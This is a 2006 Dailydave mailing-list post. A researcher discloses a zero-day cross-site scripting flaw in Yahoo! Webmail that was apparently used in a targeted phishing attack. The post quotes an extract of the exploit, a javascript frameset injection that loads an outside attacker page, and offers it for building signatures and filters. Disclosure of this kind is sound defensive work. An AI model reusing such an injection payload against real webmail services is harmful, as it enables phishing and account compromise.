Dailydave mailing list archives
[Argeniss] Alert - Yahoo! Webmail XSS
From: Cesar <sqlsec () yahoo com>
Date: Mon, 17 Apr 2006 12:15:27 -0700 (PDT)
Hi. I just got a targeted phishing attack to one of my Yahoo email accounts, what it´s insteresting it's that the attack exploits a Yahoo! webmail 0day XSS vulnerability. I'm contacting Yahoo right now but in the meantime I thought it will be good to provide some bits because the seriousness of this . When you browse a message on Yahoo! Webmail the XSS exploit creates a frameset and redirects to http://w00tynetwork.com/x/ ,it's interesting that the address bar at IE dosn´t refresh to show the actual URL, you can only see the redirection to http://w00tynetwork.com/x/ on IE status bar if you have it visible. I don't know if this vulnerability is being exploited on the wild since it was a targeted attack. Here is an extract from the exploit so you can start build some signatures, filtering, etc. ----------------------------------- (java/**/script:document.write('<frameset cols=100% rows=100% border=0 frameboarder=0framespacing=0><frame frameborder=0 src=http://w00tynetwork.com/x/></frameset>')) ----------------------------------- I will provide full details later when Yahoo! fix the issue. If security vendors are insterested on full details plese ask for them at info>at<argeniss>.<com Cesar. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
Current thread:
- [Argeniss] Alert - Yahoo! Webmail XSS Cesar (Apr 18)
- RE: [Argeniss] Alert - Yahoo! Webmail XSS Dave Korn (Apr 18)
- RE: [Argeniss] Alert - Yahoo! Webmail XSS El Nahual (Apr 18)
- <Possible follow-ups>
- RE: [Argeniss] Alert - Yahoo! Webmail XSS C programming List (Apr 18)